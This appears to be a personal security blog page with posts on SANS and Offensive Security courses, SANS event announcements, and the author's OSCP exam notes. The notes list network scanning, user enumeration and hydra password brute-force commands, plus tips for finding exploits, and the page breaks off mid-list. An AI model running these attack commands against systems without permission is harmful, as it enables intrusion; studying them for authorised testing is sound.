security.crudtastic.com

I’ll be honest .. after doing the Offensive-Security Pentesting with Backtrack course, sitting the SANS SEC-560 course lost a bit of its lustre for me. Nothing against the course .. it was awesome .. and I love all the SANS stuff!! The OffSec course though was pretty tough and I had only just completed it a few months before the SANS training, and to be honest, the OffSec course went a lot deeper.

I originally thought I’d give myself a break from doing SANS stuff for a while .. then I woke up yesterday .. and with 30 days left to sit the GPEN exam I booked it! Funnily enough, straight after that I looked at signing up for 2 other SANS courses ahahhahaah.

So now I have the task of getting ready to sit in exam in 15 days after not looking at the books in over 2 months (im so bad). This is very reminicent of my GSEC study (do a search for my post) .. and I managed to nail that ok.

Anyway .. i’m whining about my GPEN when Chris is about to head off and tackle his GSE .. Good luck nerdlinger!!

Yet another awesome email that I received this morning (what a great day it’s been for email – haha)

The guys at Offensive Security have put together a short presentation on a real-world penetration test. The video is super edited to show you just the important bits, but you get the picture of what they’re showing you.

You can see the full blog posting at http://www.offensive-security.com/videos/penetration-testing-in-the-real-world/

I personally have to say that the Offensive Security – Pentesting with Backtrack course was THE best course I have done to date! It was so intense and had an awesome lab to refine your skills in. I have gone from strength to strength since doing this course. I am in the process of rebuilding my testing lab at home so that I can continue to push my newly learnt skills and build upon what these guys have taught me. If there is any thought in your head about this particular course, all I can say is, DO IT! You will not regret it!

SANS Brisbane has just kicked off !!

More pics to come during the week

Following a very successful program in 2009, we are returning to Australia’s Capital City for SANS Canberra 2010 on 12-17 July to deliver SANS’ world-class information security training.

Register by 3 June to receive the best savings on the following courses:

• Security 401: SANS Security Essentials Bootcamp Style (GSEC) taught by Mark Hofman, SANS Certified Instructor
• Security 503: Intrusion Detection In-Depth (GCIA) taught by Johannes Ullrich, Ph.D., SANS Certified Instructor
• Audit 507: Auditing Networks, Perimeters, and Systems (GSNA) taught by James Tarala, SANS Senior Instructor
• Forensics 610: Reverse-Engineering Malware: Hands-On Analysis Tools and Techniques (GREM) taught by Michael Murr, SANS Certified Instructor
• Security 577: Virtualization Security Fundamentals – NEW! taught by James Tarala, SANS Senior Instructor

For complete course descriptions see our Event-at-Glance page.

Put the skills you’ll learn to practical use and more than GIAC certified professionals who make the info sec industry safe! Visit the GIAC Roadmap page for more information and register for your certification attempt today!

SANS training is well-known for being relevant and pragmatic. Out Canberra 2010 instructors are industry leaders and experts who understand the challenges you face on a daily basis. Their real-world experience increases the practical value of the course material.

Classes will be held at the National Convention Centre in Canberra. Canberra is one of Australia’s few planned cities, a place where architectural style complements the beauty of the surrounding Australian bush. Located on the ancient lands of the traditional owners, the Ngunnawal people, Canberra is thought to derive its name from the Aboriginal word Kamberra or ‘meeting place.’ Canberra is known for its hospitality with its trendy cafes, restaurants, nightclubs, museums and galleries, boutique shopping. Explore the cities trails and weekend markets for fresh regional produce and local wines.

To follow or tweet about this event, use hashtag #sanscanberra. Follow SANS at @SANSInstitute.

Get the training you need to advance your career. Start making your training and travel plans now to join us for SANS Canberra 2010!

http://www.sans.org/brisbane-2010/night.php

SANS @Night

Look Out! Open Source Extrusion Detection

- Eric Conrad
- Tuesday 25 May * 7:00pm – 8:00pm

Your firewall has been turned inside-out. With the advent of client-side attacks, infected USB drives, and infected mobile devices, perimeter network defenses have failed. The bad guys are already in. How do you stop them? By looking out. This talk will discuss techniques for detecting the outbound flow of sensitive information: extrusion detection. Eric Conrad will discuss the successful attacks and failed perimeter defenses that lead to the creation of Xfiltr8, the open source Extrusion Detection live CD

Read Eric’s bio here: http://www.sans.org/brisbane-2010/faculty.php

Location

The Marque
103 George Street
Brisbane, Queensland

To register:

Send RSVP to  rkantor@shearwater.com.au 

In the email please state:

Full Name

Company

SANS is bringing world-class training to Queensland for SANS Brisbane 2010 on 24-29 May! (http://www.sans.org/info/54773) Why not choose the beauty of the city along the Brisbane River as the backdrop for your training? Register by 14 April to receive the best savings on the following courses:

- Security 401: SANS Security Essentials Bootcamp Style (GSEC) taught by Mark Hofman, SANS Certified Instructor

- Security 560: Network Penetration Testing and Ethical Hacking (GPEN) taught by Eric Conrad, SANS Certified Instructor

Below is a brief snapshot of what each course covers. For complete course descriptions see: http://www.sans.org/info/54774

- SEC 401: Security 401: SANS Security Essentials Bootcamp Style (GSEC).
In this course you will learn the language and underlying theory of computer security. At the same time you will learn the essential, up-to-the-minute knowledge and skills required for effective performance if you are given the responsibility for securing systems and/or organizations. This course meets both of the key promises SANS makes to our students: (1) You will gain up-to-the-minute knowledge you can put into practice immediately upon returning to work; and, (2) You will be
taught by the best security instructors in the industry.

Maximize your training time and turbo-charge your career in information security by learning the full SANS Security Essentials curriculum needed to qualify for the GSEC certification.

- SEC 560: Network Penetration Testing and Ethical Hacking (GPEN) covers the ingredients for successful network penetration testing to help attendees improve their enterprise’s security stance.

FIND SECURITY FLAWS BEFORE THE BAD GUYS DO! We address detailed pre-test planning, including setting up an effective penetration testing infrastructure and establishing ground rules with the target organization to avoid surprises and misunderstanding. Then, we discuss a time-tested methodology for penetration and ethical hacking across the network, evaluating the security of network services and the operating systems behind them.

Both courses are associated with a GIAC Certification (GSEC and GPEN). Put the skills you’ll learn to practical use and more than GIAC certified professionals who make the info sec industry safe!  Visit http://www.giac.org/info/54779 for more information and register for your certification attempt today!

SANS training is well-known for being relevant and pragmatic. All SANS instructors are industry leaders and experts who understand the challenges you face on a daily basis.  Their real-world experience increases the practical value of the course material.  Here are some comments from recent alumni:

“The SANS class (SEC401) stands out above the rest because of the subject matter experts who teach the classes and labs.” – Shirlee Eitel-Birgham, State of Nevada

“Anyone who is in the network penetration testing field should take this course (SEC560) to improve your current skills and learn new ones.” - Nick Ramser, Ohio State University

“This is the way you need to learn: roll up your sleeves, dig in to the fundamentals and the nitty-gritty technical details, and then go ’hands-on’ to practice and reinforce what you’ve been taught.” – Joseph Price, DoD

Classes will be held at the Marque Brisbane Hotel, which is located in the heart of the city and just a minute walk to the Brisbane River. The central location is the ideal base from which to explore some of Brisbane’s best attractions. Cruise the river, shop along Queen Street, enjoy the Treasury Casino or the South Bank Parklands. A special discount rate of AUS $179 S/D will be honored based on space availability. This discount is only available through 22 April, so take advantage of this special offer and make your reservations today! For more information see http://www.sans.org/info/54784

To follow or tweet about this event, use hashtag #sansbrisbane. Follow SANS at http://twitter.com/SANSInstitute

Get the training you need to advance your career.  Start making your training and travel plans now to join us for SANS Brisbane 2010! (http://www.sans.org/info/54773)

By no means is this information useful to many people at all! This is the insane ramblings going through my head that I want to keep handy for when I get a rush of blood and start going totally off course. There are probably a few mistakes in some of the stuff here (it was written in haste) – but I’m sure if you’re interested, or know about what is written here, then you’ll know the correct syntax for the commands (or be able to work it out).

If you do find some of this information of any use to you … AWESOME!! Otherwise, move along, there’s nothing to see here.

These notes are just brain jerkers for my OFFSEC101 / OSCP exam that I will be taking on Monday the 21st December. It’s a 24hr lab challenge where you are meant to be hack 5 separate machines and gain root/admin/system access. All in all I feel ok about it .. I’m more worried about the unknown factor in these types of exams (it’s not a learn and repeat type thing) where you’re thinking outside of your normal boundaries, there’s also the fact that it goes for 24hrs and fatigue can make people do silly things!

I’ll let you all know how I go after the event! Now, back to the notes …

Notes

Use Leo and make a new child entry for each IP. Keep ALL information related to testing of that machine in that child entry. Create child entries within the IP entry for each type of scan/information gathering. Create a totally separate child entry for username/password combinations, general notes etc. Leo/good record keeping is what will win the game.

Scan network for live hosts

(nmap/zenmap)

For NMAP –

nmap -vv -sP 192.168.0.1-254 -oG hosts_up.txt

cat hosts_up.txt | grep -i “up”

nmap -PN 192.168.9.200-254

(this will also show open ports for each host)

Identify OS

(nmap/zenmap)

For NMAP –

nmap -O 192.168.0.100 (just OS fingerprint)

nmap -A 192.168.9.201 (runs an “aggressive” scan – scan,OS fingerprint, version scan, scripts and traeroute)

Check hosts for services

(nmap/zenmap)

For NMAP

- nmap -sS 192.168.9.254 (TCP)

- nmap -sU 192.168.9.254 (UDP)

(Could be better to do this in zenmap and group servers by services)

FOR SNMP

-  snmpwalk -c public -v1 192.168.9.254 1 |grep hrSWRunName|cut -d” ” -f

For a known port

- nmap – p 139 192.168.9.254

DNS Lookups/Hostnames

host -l <domain> <dns server>

e.g. host -l acme.local 192.168.0.220

Banner grab/Version services

(nmap/zenmap/SNMP)

Check versions of software/services against milw0rm and security focus)

For NMAP

- nmap -sV 192.168.9.254

For SNMP

snmpenum -t 192.168.0.100 (displays all snmp informations for that server)

For SMTP

nc -v <mailserver> 25

- Will give mailserver version. Can also VRFY to find valid usernames/email accounts

Netbios/SMB

- smb4k (graphical interface – lists shares)

- smbserverscan

- metasploit auxiliary scanner

./msfconsole

show

use scanner/smb/version

set RHOSTS 192.168.0.1-192.168.0.254

run

Enumerate Usernames

(SNMP/SMTP/SMB[NETBIOS]/Add others here)

For SMB

- nmap -sT -p 445 192.168.9.200-254 -oG smb_results.txt (then grep open sessions)

(on my machine /root/offsec) ./samrdump.py 192.168.9.201 (results from above)

For SNMP

- nmap -sT -p 161 192.168.9.200/254 -oG snmp_results.txt (then grep)

- snmpwalk public -v1 192.168.9.201 1 |grep 77.1.2.25 |cut -d” “ -f4

For SMTP – (/pentest/enumeration/vrfy)

- ./smtp_VRFY.py <mailserver IP>

** NEED TO MAKE THREADED – VERY SLOW **

SAMRDUMP.PY – (/pentest/python/impacket-examples/samrdump.py)

- ./samrdump.py SNMP server

*** NAMES.TXT – /pentest/enumeration/vrfy/names.txt ***

*** OR /pentest/web/wfuzz/wordlists/others/names.txt ***

Crack Passwords

(hydra/THC bruter)

(need mil-dict.txt from Milw0rm – cracked hashs)

FTP – hydra -l <username> -P mil-dic.txt -f <FTP SERVER> ftp -V

POP3 – hydra -l <username> -P mil-dict.txt -f <MAIL SERVER> pop3 -V (may need to use -t 15 to limit concurrent connections)

SNMP – hydra -P mil-dict.txt -f <SNMP SERVER> -V

MS VPN – dos2unix words (whatever word list)

cat words | thc-pptp-bruter VPN server

Look for known vulnerable services

(refer nmap/zenmap output)

Check versions of software (by either snmp enumeration or nmap/zenmap) against http://www.milw0rm.com/search.php or http://www.securityfocus.com/vulnerabilities or http://www.exploit-db.com

Compile exploit code if possible

(milw0rm archive)

cd /pentest/exploits/milw0rm

cat sploitlist.txt | grep -i [exploit]

Some exploits may be written for compilation under Windows, while others for Linux.

You can identify the environment by inspecting the headers.

cat exploit | grep “#include”

Windows:  process.h, string.h, winbase.h, windows.h, winsock2.h

Linux:   arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h

Grep out Windows headers, to leave only Linux based exploits:

cat sploitlist.txt | grep -i exploit | cut -d ” ” -f1 | xargs grep sys | cut -d “:” -f1 | sort -u

LINUX